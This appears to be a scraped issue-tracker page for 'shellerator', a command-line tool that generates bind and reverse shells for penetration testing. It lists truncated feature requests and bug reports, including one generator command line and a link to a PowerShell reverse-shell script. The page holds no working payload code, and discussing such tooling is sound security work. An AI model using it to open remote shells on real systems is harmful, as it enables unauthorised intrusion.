shellerator icon indicating copy to clipboard operation
shellerator copied to clipboard

Simple CLI tool for the generation of bind and reverse shells in multiple languages

Results 8 shellerator issues
Sort by recently updated
recently updated
newest added

Ctrl-c before: ![2022-05-08_22-47](https://user-images.githubusercontent.com/78065668/167337475-f684b594-7edf-4988-8f4e-5708798ad7aa.png) Ctrl-c after: ![2022-05-08_22-48](https://user-images.githubusercontent.com/78065668/167337490-645dc24e-c45f-4674-bd83-136086ad5e53.png)

We could add an option like `--start-listener` for the `--reverse-shell` group that makes shellerator handle the listener and shell improvement parts. The idea comes from [this PR on Exegol](https://github.com/ShutdownRepo/Exegol/pull/31). PR...

help wanted

Add non-alphanum PHP eval revshell

help wanted

Greetings, This PR aims to simplify the source code by putting all reverse shells in JSON files so it's easier to read the source code and it split the logic...

whould be interesting to add selection and encoding example: shellerator --reverse-shell --type powershell --lhost 10.10.16.155 --lport 1337 -select 1 -platform windows -encrypt base64 -select 1

help wanted

Basically just imported this reverse shell: https://gist.githubusercontent.com/egre55/c058744a4240af6515eb32b2d33fbed3/raw/3ad91872713d60888dca95850c3f6e706231cb40/powershell_reverse_shell.ps1 Demonstration using exegol:nightly that it works now. Attacker: ![image](https://github.com/user-attachments/assets/4b6b19ce-29b6-4521-9683-c422b09bf34d) Victim: ![image](https://github.com/user-attachments/assets/6b5d2afd-5954-4118-be2a-0b025b963ee2)

Both generated powershell reverse shells do not work: I used the following command to generate the reverse shells: ```bash # shellerator --type powershell --lport 443 --lhost 127.0.0.1 [1] powershell -NoP...

help wanted